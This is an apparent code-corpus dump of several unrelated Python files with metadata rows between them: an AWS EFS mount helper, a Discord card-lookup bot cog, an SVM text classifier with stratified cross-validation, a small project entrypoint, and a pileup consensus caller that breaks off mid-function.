expected_replacement_field_ct += 1
config_section = CONFIG_SECTION
region = format_args.get('region')
if region:
region_specific_config_section = '%s.%s' % (CONFIG_SECTION, region)
if config.has_section(region_specific_config_section):
config_section = region_specific_config_section
format_args['dns_name_suffix'] = config.get(config_section, 'dns_name_suffix')
logging.debug("Using dns_name_suffix %s in config section [%s]", format_args.get('dns_name_suffix'), config_section)
_validate_replacement_field_count(dns_name_format, expected_replacement_field_ct)
dns_name = dns_name_format.format(**format_args)
try:
socket.gethostbyname(dns_name)
except socket.gaierror:
fatal_error('Failed to resolve "%s" - check that your file system ID is correct.\nSee %s for more detail.'
% (dns_name, 'https://docs.aws.amazon.com/console/efs/mount-dns-name'),
'Failed to resolve "%s"' % dns_name)
return dns_name
def tls_paths_dictionary(mount_name, base_path=STATE_FILE_DIR):
tls_dict = {
'mount_dir': os.path.join(base_path, mount_name),
# every mount will have its own ca mode assets due to lack of multi-threading support in openssl
'database_dir': os.path.join(base_path, mount_name, 'database'),
'certs_dir': os.path.join(base_path, mount_name, 'certs'),
'index': os.path.join(base_path, mount_name, 'database/index.txt'),
'index_attr': os.path.join(base_path, mount_name, 'database/index.txt.attr'),
'serial': os.path.join(base_path, mount_name, 'database/serial'),
'rand': os.path.join(base_path, mount_name, 'database/.rand')
}
return tls_dict
def get_public_key_sha1(public_key):
# truncating public key to remove the header and footer '-----(BEGIN|END) PUBLIC KEY-----'
with open(public_key, 'r') as f:
lines = f.readlines()
lines = lines[1:-1]
key = ''.join(lines)
key = bytearray(base64.b64decode(key))
# Parse the public key to pull out the actual key material by looking for the key BIT STRING
# Example:
# 0:d=0 hl=4 l= 418 cons: SEQUENCE
# 4:d=1 hl=2 l= 13 cons: SEQUENCE
# 6:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
# 17:d=2 hl=2 l= 0 prim: NULL
# 19:d=1 hl=4 l= 399 prim: BIT STRING
cmd = 'openssl asn1parse -inform PEM -in %s' % public_key
output, err = subprocess_call(cmd, 'Unable to ASN1 parse public key file, %s, correctly' % public_key)
key_line = ''
for line in output.splitlines():
if 'BIT STRING' in line.decode('utf-8'):
key_line = line.decode('utf-8')
if not key_line:
err_msg = 'Public key file, %s, is incorrectly formatted' % public_key
fatal_error(err_msg, err_msg)
key_line = key_line.replace(' ', '')
# DER encoding TLV (Tag, Length, Value)
# - the first octet (byte) is the tag (type)
# - the next octets are the length - "definite form"
# - the first octet always has the high order bit (8) set to 1
# - the remaining 127 bits are used to encode the number of octets that follow
# - the following octets encode, as big-endian, the length (which may be 0) as a number of octets
# - the remaining octets are the "value" aka content
#
# For a BIT STRING, the first octet of the value is used to signify the number of unused bits that exist in the last
# content byte. Note that this is explicitly excluded from the SubjectKeyIdentifier hash, per
# https://tools.ietf.org/html/rfc5280#section-4.2.1.2
#
# Example:
# 0382018f00...<subjectPublicKey>
# - 03 - BIT STRING tag
# - 82 - 2 length octets to follow (ignore high order bit)
# - 018f - length of 399
# - 00 - no unused bits in the last content byte
offset = int(key_line.split(':')[0])
key = key[offset:]
num_length_octets = key[1] & 0b01111111
# Exclude the tag (1), length (1 + num_length_octets), and number of unused bits (1)
offset = 1 + 1 + num_length_octets + 1
key = key[offset:]
sha1 = hashlib.sha1()
sha1.update(key)
return sha1.hexdigest()
def create_canonical_request(public_key_hash, date, access_key, region, fs_id, session_token=None):
"""
Create a Canonical Request - https://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html
"""
formatted_datetime = date.strftime(SIGV4_DATETIME_FORMAT)
credential = quote_plus(access_key + '/' + get_credential_scope(date, region))
request = HTTP_REQUEST_METHOD + '\n'
request += CANONICAL_URI + '\n'
request += create_canonical_query_string(public_key_hash, credential, formatted_datetime, session_token) + '\n'
request += CANONICAL_HEADERS % fs_id + '\n'
request += SIGNED_HEADERS + '\n'
sha256 = hashlib.sha256()
sha256.update(REQUEST_PAYLOAD.encode())
request += sha256.hexdigest()
return request
def create_canonical_query_string(public_key_hash, credential, formatted_datetime, session_token=None):
canonical_query_params = {
'Action': 'Connect',
# Public key hash is included in canonical request to tie the signature to a specific key pair to avoid replay attacks
'PublicKeyHash': quote_plus(public_key_hash),
'X-Amz-Algorithm': ALGORITHM,
'X-Amz-Credential': credential,
'X-Amz-Date': quote_plus(formatted_datetime),
'X-Amz-Expires': 86400,
'X-Amz-SignedHeaders': SIGNED_HEADERS,
}
if session_token:
canonical_query_params['X-Amz-Security-Token'] = quote_plus(session_token)
# Cannot use urllib.urlencode because it replaces the %s's
return '&'.join(['%s=%s' % (k, v) for k, v in sorted(canonical_query_params.items())])
def create_string_to_sign(canonical_request, date, region):
"""
Create a String to Sign - https://docs.aws.amazon.com/general/latest/gr/sigv4-create-string-to-sign.html
"""
string_to_sign = ALGORITHM + '\n'
string_to_sign += date.strftime(SIGV4_DATETIME_FORMAT) + '\n'
string_to_sign += get_credential_scope(date, region) + '\n'
sha256 = hashlib.sha256()
sha256.update(canonical_request.encode())
string_to_sign += sha256.hexdigest()
return string_to_sign
def calculate_signature(string_to_sign, date, secret_access_key, region):
"""
Calculate the Signature - https://docs.aws.amazon.com/general/latest/gr/sigv4-calculate-signature.html
"""
def _sign(key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256)
key_date = _sign(('AWS4' + secret_access_key).encode('utf-8'), date.strftime(DATE_ONLY_FORMAT)).digest()
add_region = _sign(key_date, region).digest()
add_service = _sign(add_region, SERVICE).digest()
signing_key = _sign(add_service, 'aws4_request').digest()
return _sign(signing_key, string_to_sign).hexdigest()
def get_credential_scope(date, region):
return '/'.join([date.strftime(DATE_ONLY_FORMAT), region, SERVICE, AWS4_REQUEST])
def match_device(config, device):
"""Return the EFS id and the remote path to mount"""
try:
remote, path = device.split(':', 1)
except ValueError:
remote = device
path = '/'
if FS_ID_RE.match(remote):
return remote, path
try:
primary, secondaries, _ = socket.gethostbyname_ex(remote)
hostnames = list(filter(lambda e: e is not None, [primary] + secondaries))
except socket.gaierror:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error(
'Failed to resolve "%s" - check that the specified DNS name is a CNAME record resolving to a valid EFS DNS '
'name' % remote,
'Failed to resolve "%s"' % remote
)
if not hostnames:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error(
'The specified domain name "%s" did not resolve to an EFS mount target' % remote
)
for hostname in hostnames:
efs_fqdn_match = EFS_FQDN_RE.match(hostname)
if efs_fqdn_match:
fs_id = efs_fqdn_match.group('fs_id')
expected_dns_name = get_dns_name(config, fs_id)
# check that the DNS name of the mount target matches exactly the DNS name the CNAME resolves to
if hostname == expected_dns_name:
return fs_id, path
else:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error('The specified CNAME "%s" did not resolve to a valid DNS name for an EFS mount target. '
'Please refer to the EFS documentation for mounting with DNS names for examples: %s'
% (remote, 'https://docs.aws.amazon.com/efs/latest/ug/mounting-fs-mount-cmd-dns-name.html'))
def is_nfs_mount(mountpoint):
cmd = ['stat', '-f', '-L', '-c', '%T', mountpoint]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
output, _ = p.communicate()
return output and 'nfs' in str(output)
def mount_tls(config, init_system, dns_name, path, fs_id, mountpoint, options):
if os.path.ismount(mountpoint) and is_nfs_mount(mountpoint):
sys.stdout.write("%s is already mounted, please run 'mount' command to verify\n" % mountpoint)
logging.warning("%s is already mounted, mount aborted" % mountpoint)
return
with bootstrap_tls(config, init_system, dns_name, fs_id, mountpoint, options) as tunnel_proc:
mount_completed = threading.Event()
t = threading.Thread(target=poll_tunnel_process, args=(tunnel_proc, fs_id, mount_completed))
t.daemon = True
t.start()
mount_nfs(dns_name, path, mountpoint, options)
mount_completed.set()
t.join()
def check_unsupported_options(options):
for unsupported_option in UNSUPPORTED_OPTIONS:
if unsupported_option in options:
warn_message = 'The "%s" option is not supported and has been ignored, as amazon-efs-utils relies on a built-in ' \
'trust store.' % unsupported_option
sys.stderr.write('WARN: %s\n' % warn_message)
logging.warning(warn_message)
del options[unsupported_option]
def check_options_validity(options):
if 'tls' in options:
if 'port' in options:
fatal_error('The "port" and "tls" options are mutually exclusive')
if 'tlsport' in options:
try:
int(options['tlsport'])
except ValueError:
fatal_error('tlsport option [%s] is not an integer' % options['tlsport'])
if 'ocsp' in options and 'noocsp' in options:
fatal_error('The "ocsp" and "noocsp" options are mutually exclusive')
if 'accesspoint' in options:
if 'tls' not in options:
fatal_error('The "tls" option is required when mounting via "accesspoint"')
if not AP_ID_RE.match(options['accesspoint']):
fatal_error('Access Point ID %s is malformed' % options['accesspoint'])
if 'iam' in options and 'tls' not in options:
fatal_error('The "tls" option is required when mounting via "iam"')
if 'awsprofile' in options and 'iam' not in options:
fatal_error('The "iam" option is required when mounting with named profile option, "awsprofile"')
if 'awscredsuri' in options and 'iam' not in options:
fatal_error('The "iam" option is required when mounting with "awscredsuri"')
if 'awscredsuri' in options and 'awsprofile' in options:
fatal_error('The "awscredsuri" and "awsprofile" options are mutually exclusive')
def bootstrap_cloudwatch_logging(config, fs_id=None):
if not check_if_cloudwatch_log_enabled(config):
return None
cloudwatchlog_client = get_botocore_client(config, 'logs')
if not cloudwatchlog_client:
return None
cloudwatchlog_config = get_cloudwatchlog_config(config, fs_id)
log_group_name = cloudwatchlog_config.get('log_group_name')
log_stream_name = cloudwatchlog_config.get('log_stream_name')
retention_days = cloudwatchlog_config.get('retention_days')
group_creation_completed = create_cloudwatch_log_group(cloudwatchlog_client, log_group_name)
if not group_creation_completed:
return None
put_retention_policy_completed = put_cloudwatch_log_retention_policy(cloudwatchlog_client, log_group_name, retention_days)
if not put_retention_policy_completed:
return None
stream_creation_completed = create_cloudwatch_log_stream(cloudwatchlog_client, log_group_name, log_stream_name)
if not stream_creation_completed:
return None
return {
'client': cloudwatchlog_client,
'log_group_name': log_group_name,
'log_stream_name': log_stream_name
}
def create_default_cloudwatchlog_agent_if_not_exist(config):
if not check_if_cloudwatch_log_enabled(config):
return None
global CLOUDWATCHLOG_AGENT
if not CLOUDWATCHLOG_AGENT:
CLOUDWATCHLOG_AGENT = bootstrap_cloudwatch_logging(config)
def get_botocore_client(config, service):
if not BOTOCORE_PRESENT:
logging.error('Failed to import botocore, please install botocore first.')
return None
session = botocore.session.get_session()
region = get_target_region(config)
iam_role_name = get_iam_role_name()
if iam_role_name:
credentials, _ = get_aws_security_credentials_from_instance_metadata(iam_role_name)
if credentials:
return session.create_client(service, aws_access_key_id=credentials['AccessKeyId'],
aws_secret_access_key=credentials['SecretAccessKey'],
aws_session_token=credentials['Token'], region_name=region)
return session.create_client(service, region_name=region)
def get_cloudwatchlog_config(config, fs_id=None):
log_group_name = DEFAULT_CLOUDWATCH_LOG_GROUP
if config.has_option(CLOUDWATCH_LOG_SECTION, 'log_group_name'):
log_group_name = config.get(CLOUDWATCH_LOG_SECTION, 'log_group_name')
retention_days = DEFAULT_RETENTION_DAYS
if config.has_option(CLOUDWATCH_LOG_SECTION, 'retention_in_days'):
retention_days = config.get(CLOUDWATCH_LOG_SECTION, 'retention_in_days')
log_stream_name = get_cloudwatch_log_stream_name(fs_id)
return {
'log_group_name': log_group_name,
'retention_days': int(retention_days),
'log_stream_name': log_stream_name
}
def get_cloudwatch_log_stream_name(fs_id=None):
instance_id = get_instance_identity_info_from_instance_metadata('instanceId')
if instance_id and fs_id:
log_stream_name = '%s - %s - mount.log' % (fs_id, instance_id)
elif instance_id:
log_stream_name = '%s - mount.log' % (instance_id)
elif fs_id:
log_stream_name = '%s - mount.log' % (fs_id)
else:
log_stream_name = 'default - mount.log'
return log_stream_name
def check_if_cloudwatch_log_enabled(config):
if config.has_option(CLOUDWATCH_LOG_SECTION, 'enabled'):
return config.getboolean(CLOUDWATCH_LOG_SECTION, 'enabled')
return False
def cloudwatch_create_log_group_helper(cloudwatchlog_client, log_group_name):
cloudwatchlog_client.create_log_group(
logGroupName=log_group_name
)
logging.info('Created cloudwatch log group %s' % log_group_name)
def create_cloudwatch_log_group(cloudwatchlog_client, log_group_name):
try:
cloudwatch_create_log_group_helper(cloudwatchlog_client, log_group_name)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceAlreadyExistsException':
logging.debug('Log group %s already exist, %s' % (log_group_name, e.response))
return True
elif exception == 'LimitExceededException':
logging.error('Reached the maximum number of log groups that can be created, %s' % e.response)
return False
elif exception == 'OperationAbortedException':
logging.debug('Multiple requests to update the same log group %s were in conflict, %s' % (log_group_name, e.response))
return False
elif exception == 'InvalidParameterException':
logging.error('Log group name %s is specified incorrectly, %s' % (log_group_name, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_put_retention_policy_helper(cloudwatchlog_client, log_group_name, retention_days):
cloudwatchlog_client.put_retention_policy(
logGroupName=log_group_name,
retentionInDays=retention_days
)
logging.debug('Set cloudwatch log group retention days to %s' % retention_days)
def put_cloudwatch_log_retention_policy(cloudwatchlog_client, log_group_name, retention_days):
try:
cloudwatch_put_retention_policy_helper(cloudwatchlog_client, log_group_name, retention_days)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceNotFoundException':
logging.error('Log group %s does not exist, %s' % (log_group_name, e.response))
return False
elif exception == 'OperationAbortedException':
logging.debug('Multiple requests to update the same log group %s were in conflict, %s' % (log_group_name, e.response))
return False
elif exception == 'InvalidParameterException':
logging.error('Either parameter log group name %s or retention in days %s is specified incorrectly, %s'
% (log_group_name, retention_days, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_create_log_stream_helper(cloudwatchlog_client, log_group_name, log_stream_name):
cloudwatchlog_client.create_log_stream(
logGroupName=log_group_name,
logStreamName=log_stream_name
)
logging.info('Created cloudwatch log stream %s in log group %s' % (log_stream_name, log_group_name))
def create_cloudwatch_log_stream(cloudwatchlog_client, log_group_name, log_stream_name):
try:
cloudwatch_create_log_stream_helper(cloudwatchlog_client, log_group_name, log_stream_name)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceAlreadyExistsException':
logging.debug('Log stream %s already exist in log group %s, %s' % (log_stream_name, log_group_name, e.response))
return True
elif exception == 'InvalidParameterException':
logging.error('Either parameter log group name %s or log stream name %s is specified incorrectly, %s'
% (log_group_name, log_stream_name, e.response))
return False
elif exception == 'ResourceNotFoundException':
logging.error('Log group %s does not exist, %s' % (log_group_name, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_put_log_events_helper(cloudwatchlog_agent, message, token=None):
kwargs = {
'logGroupName': cloudwatchlog_agent.get('log_group_name'),
'logStreamName': cloudwatchlog_agent.get('log_stream_name'),
'logEvents': [
{
'timestamp': int(round(time.time() * 1000)),
'message': message
}
]
}
if token:
kwargs['sequenceToken'] = token
cloudwatchlog_agent.get('client').put_log_events(**kwargs)
def publish_cloudwatch_log(cloudwatchlog_agent, message):
if not cloudwatchlog_agent or not cloudwatchlog_agent.get('client'):
return False
token = get_log_stream_next_token(cloudwatchlog_agent)
try:
cloudwatch_put_log_events_helper(cloudwatchlog_agent, message, token)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'InvalidSequenceTokenException':
logging.debug('The sequence token is not valid, %s' % e.response)
return False
elif exception == 'InvalidParameterException':
logging.debug('One of the parameter to put log events is not valid, %s' % e.response)
return False
elif exception == 'DataAlreadyAcceptedException':
logging.debug('The event %s was already logged, %s' % (message, e.response))
return False
elif exception == 'UnrecognizedClientException':
logging.debug('The most likely cause is an invalid AWS access key ID or secret Key, %s' % e.response)
return False
elif exception == 'ResourceNotFoundException':
logging.error('Either log group %s or log stream %s does not exist, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
return False
else:
logging.debug('Unexpected error: %s' % e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_describe_log_streams_helper(cloudwatchlog_agent):
return cloudwatchlog_agent.get('client').describe_log_streams(
logGroupName=cloudwatchlog_agent.get('log_group_name'),
logStreamNamePrefix=cloudwatchlog_agent.get('log_stream_name')
)
def get_log_stream_next_token(cloudwatchlog_agent):
try:
response = cloudwatch_describe_log_streams_helper(cloudwatchlog_agent)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'InvalidParameterException':
logging.debug('Either parameter log group name %s or log stream name %s is specified incorrectly, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
elif exception == 'ResourceNotFoundException':
logging.debug('Either log group %s or log stream %s does not exist, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
else:
handle_general_botocore_exceptions(e)
return None
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return None
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return None
except Exception as e:
logging.warning('Unknown error, %s' % e)
return None
try:
log_stream = response['logStreams'][0]
return log_stream.get('uploadSequenceToken')
except (IndexError, TypeError, KeyError):
pass
return None
def handle_general_botocore_exceptions(error):
exception = error.response['Error']['Code']
if exception == 'ServiceUnavailableException':
logging.debug('The service cannot complete the request, %s' % error.response)
elif exception == 'AccessDeniedException':
logging.debug('User is not authorized to perform the action, %s' % error.response)
else:
logging.debug('Unexpected error: %s' % error)
def main():
parse_arguments_early_exit()
assert_root()
config = read_config()
bootstrap_logging(config)
fs_id, path, mountpoint, options = parse_arguments(config)
logging.info('version=%s options=%s', VERSION, options)
global CLOUDWATCHLOG_AGENT
CLOUDWATCHLOG_AGENT = bootstrap_cloudwatch_logging(config, fs_id)
check_unsupported_options(options)
check_options_validity(options)
init_system = get_init_system()
check_network_status(fs_id, init_system)
dns_name = get_dns_name(config, fs_id)
if 'tls' in options:
mount_tls(config, init_system, dns_name, path, fs_id, mountpoint, options)
else:
mount_nfs(dns_name, path, mountpoint, options)
if '__main__' == __name__:
main()
| 38.560583 | 130 | 0.680535 | 0 | 0 | 5,071 | 0.066117 | 3,928 | 0.051215 | 0 | 0 | 22,517 | 0.293584 |
6a01fe7f065ff8fbb40e8cf44137b52463e1417c | 1,010 | py | Python | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | [
"MIT"
] | null | null | null | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | [
"MIT"
] | null | null | null | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
from discord.utils import get
class c8(commands.Cog, name="c8"):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.command(name='Sacrosanct_Devouring_Pyre', aliases=['c8'])
async def example_embed(self, ctx):
embed = discord.Embed(title='Sacrosanct Devouring Pyre',
color=0xBC5A84)
embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2308475.jpg')
embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)
embed.add_field(name='Type', value='Trap/Normal', inline=False)
embed.add_field(name='Card Effect', value='Tribute 2 monsters, then target 2 monsters; destroy those targets. You can only activate 1 "Sacrosanct Devouring Pyre" per turn.', inline=False)
embed.set_footer(text='Set Code: ANCF')
await ctx.send(embed=embed)
def setup(bot: commands.Bot):
bot.add_cog(c8(bot)) | 43.913043 | 195 | 0.687129 | 875 | 0.866337 | 0 | 0 | 769 | 0.761386 | 697 | 0.690099 | 351 | 0.347525 |
6a023f8c8af70de4e0b8e937c5773e7da489fab5 | 2,627 | py | Python | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | [
"MIT"
] | null | null | null | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | [
"MIT"
] | null | null | null | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | [
"MIT"
] | null | null | null | """
This script is where the preprocessed data is used to train the SVM model to
perform the classification. I am using Stratified K-Fold Cross Validation to
prevent bias and/or any imbalance that could affect the model's accuracy.
REFERENCE: https://medium.com/@bedigunjit/simple-guide-to-text-classification-nlp-using-svm-and-naive-bayes-with-python-421db3a72d34
"""
import numpy as np
import pandas as pd
from sklearn import model_selection, svm
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import StratifiedKFold
# Open preproccessed csv
df = pd.read_csv("preprocessed.csv", index_col=0)
print(df.head())
print("SPLITTING TRAIN-TEST")
x = df["Text"]
y = df["PublicationTitle"]
train_x, test_x, train_y, test_y = model_selection.train_test_split(
df["Text"], df["PublicationTitle"], test_size=0.3)
# Label encode the target variable to transform categorical data of string
# type into numerical values the model can understand
encoder = LabelEncoder()
# train_y = encoder.fit_transform(train_y)
# test_y = encoder.fit_transform(test_y)
# Word vectorization
# turning a collection of text documents into numerical feature vectors
# We are using Term Frequency - Inverse Document
tfidf_vect = TfidfVectorizer(max_features=5000)
tfidf_vect.fit(df["Text"])
# train_x_tfidf = tfidf_vect.transform(train_x)
# test_x_tfidf = tfidf_vect.transform(test_x)
x_tfidf = tfidf_vect.transform(df["Text"])
y = encoder.fit_transform(y)
# print(tfidf_vect.vocabulary_)
# Fit the training dataset to the classifier
print("TRAINING THE MODEL")
SVM = svm.SVC(C=1.0, kernel='linear', degree=3, gamma='auto')
skf = StratifiedKFold(n_splits=10, shuffle=True, random_state=1)
accuracies = []
fold = 1
for train_idx, test_idx in skf.split(x, y):
print("Working on fold", fold)
x_train_fold, x_test_fold = x_tfidf[train_idx], x_tfidf[test_idx]
y_train_fold, y_test_fold = y[train_idx], y[test_idx]
SVM.fit(x_train_fold, y_train_fold)
acc = SVM.score(x_test_fold, y_test_fold)
print("Acc", fold, ":", acc)
accuracies.append(acc)
fold += 1
print("ACCURACIES:", accuracies)
print("Max Accuracy:", np.max(accuracies))
print("Min Accuracy:", np.min(accuracies))
print("Mean of Accuracies:", np.mean(accuracies))
print("STD of Accuracies:", np.std(accuracies))
# print("RUNNING TEST PREDICTIONS")
# predictions = SVM.predict(test_x_tfidf)
# # Calculate accuracy score
# accuracy = accuracy_score(test_y, predictions)
# print("Accuracy:", str(accuracy * 100) + "%")
| 31.650602 | 132 | 0.760183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,351 | 0.514275 |
6a046c97530ca1a780b9dd23d59ddcc8df166fa3 | 263 | py | Python | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | [
"MIT"
] | null | null | null | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | [
"MIT"
] | null | null | null | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | [
"MIT"
] | null | null | null | from rsterm import EntryPoint
from red_dwarf.project import provide_project_context, ProjectContext
class InitProject(EntryPoint):
@provide_project_context
def run(self, project_context: ProjectContext) -> None:
project_context.init_project()
| 23.909091 | 69 | 0.790875 | 159 | 0.604563 | 0 | 0 | 123 | 0.467681 | 0 | 0 | 0 | 0 |
6a048666edf3e5d75a0ded13639990b1d6bed2e8 | 33,554 | py | Python | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | [
"MIT"
] | null | null | null | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | [
"MIT"
] | null | null | null | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# Copyright Ivan Sovic, 2015. www.sovic.org
#
# Creates a pileup from a given SAM/BAM file, and calls consensus bases (or variants).
import os
import sys
import operator
import subprocess
def increase_in_dict(dict_counter, value):
try:
dict_counter[value] += 1
except:
dict_counter[value] = 1
def process_mpileup_line(
line,
line_number,
ret_variant_list,
ret_vcf_list,
ret_snp_count,
ret_insertion_count,
ret_deletion_count,
ret_num_undercovered_bases,
ret_num_called_bases,
ret_num_correct_bases,
ret_coverage_sum,
coverage_threshold,
verbose=False,
):
# Split the line, and perform a sanity check.
split_line = line.strip().split("\t")
if len(split_line) < 5 or len(split_line) > 6:
sys.stderr.write(line + "\n")
return 0
ref_name = split_line[0]
position = split_line[1]
ref_base = split_line[2]
coverage = split_line[3]
original_bases = split_line[4]
if len(split_line) == 6:
qualities = split_line[5]
bases = ""
# Replace the '.' and ',' signs with the actual reference base.
i = 0
while i < len(original_bases):
if original_bases[i] == "." or original_bases[i] == ",":
bases += ref_base
else:
bases += original_bases[i]
i += 1
base_counts = {}
insertion_count = 0
current_base_deletion_count = 0
deletion_count = 0
insertion_event_counts = {}
deletion_event_counts = {}
end_counts = 0
# print 'position: %s' % position;
# print 'bases: "%s"' % bases;
# print 'line_number: %d' % line_number;
# print line;
# print '';
# sys.stdout.flush();
i = 0
while i < len(bases):
base = bases[i]
if base == r"^":
# This is the starting position of a read. It encodes two
# symbols: '^' marking the read start and a char marking the
# mapping quality of the read.
# increase_in_dict(base_counts, bases[i + 1].upper());
i += 1
# Increase only by 1, because we have i += 1 down there.
elif base == r"$":
# This marks the end of a read.
end_counts += 1
elif base == r"*":
# This is a deletion, just count it.
current_base_deletion_count += 1
elif base == r"-":
# This marks the occurance of deletions. It is a composite object
# consisting of: the special character '-', the number of the deleted bases
# and the actual bases that are deleted (these bases follow the current position).
# In our approach, we ignore this case, because we count deletions one by one
# through the '*' character.
# Get the number of bases that need to be skipped in the string.
j = i + 1
while bases[j] in "0123456789":
j += 1
num_bases = int(bases[(i + 1) : j])
skip_bases = (j - i) + num_bases - 1
deletion_count += 1
deletion = bases[j : (j + num_bases)].upper()
increase_in_dict(deletion_event_counts, deletion)
# Skip the length of the numeric entry plus the actual number of bases
# that need to be skipped.
i += skip_bases
elif base == r"+":
# This marks the occurance of an insertion. It is a composite object
# consisting of: the special character '+', the number of the inserted bases
# and the actual bases that are inserted (these bases follow the current position).
# Similar to the deletion marking, but here we actually care about the bases,
# and we need to make an allele aware count.
# Get the number of bases that are inserted;
j = i + 1
while bases[j] in "0123456789":
j += 1
num_bases = int(bases[(i + 1) : j])
skip_bases = (j - i) + num_bases - 1
insertion_count += 1
insertion = bases[j : (j + num_bases)].upper()
increase_in_dict(insertion_event_counts, insertion)
i += skip_bases
else:
increase_in_dict(base_counts, bases[i].upper())
i += 1
# TODO: An additional problematic case, discovered this on 03.11.2014., when analyzing BWA-MEM's mpileup.
# There are pileup bases that do not have any actual bases, but only the '*' symbols. How should this be handled properly?
# Example line from the mpileup file:
# gi|48994873|gb|U00096.2|_Escherichia_coli_str._K-12_substr._MG1655,_complete_genome 1938202 T 20 ******************** 8,2*#-;)$B>2$1&D-
# I chose to handle them as undercovered bases.
non_indel_coverage_current_base = int(coverage) - current_base_deletion_count
if verbose == True:
sys.stdout.write("%s\nbase_counts: %s\n" % (line.strip(), str(base_counts)))
# EDIT: Previously I compared the total coverage of the current base with the coverage threshold.
# However, the total coverage also accounts for the deletions denoted with the '*' sign, which I think
# isn't relevant, as deletions are counted prior to occuring, and at that point is already decided if there is going
# to be a deletion event. If we wound up at this base (i.e. this base didn't get skipped because of a deletion
# consensus), then the deletions on this base are ignored.
# if (int(coverage) < coverage_threshold or int(coverage) == current_base_deletion_count):
# if (non_indel_coverage_current_base < coverage_threshold):
if int(coverage) < coverage_threshold:
ret_num_undercovered_bases[0] += 1
# ret_coverage_sum[0] += 0;
ret_coverage_sum[0] += int(coverage)
# TODO: Should I count total coverage of this base, or the non_indel_coverage_current_base?
sorted_base_counts = [["A", 0], ["C", 0], ["T", 0], ["G", 0]]
sorted_base_counts = sorted(
list(base_counts.items()), key=operator.itemgetter(1)
)
try:
most_common_base_count = sorted_base_counts[-1][1]
except Exception as e:
most_common_base_count = 0
pass
# variant_line = 'undercovered1\tpos = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s' % (position, int(coverage), non_indel_coverage_current_base, most_common_base_count, ref_base, sorted_base_counts[-1][0], str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
variant_line = (
"undercovered1\tpos = %s\tref = %s\tcoverage = %d\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s"
% (
position,
ref_name,
int(coverage),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
)
)
ret_variant_list.append(variant_line)
### VCF output ###
qual = 1000
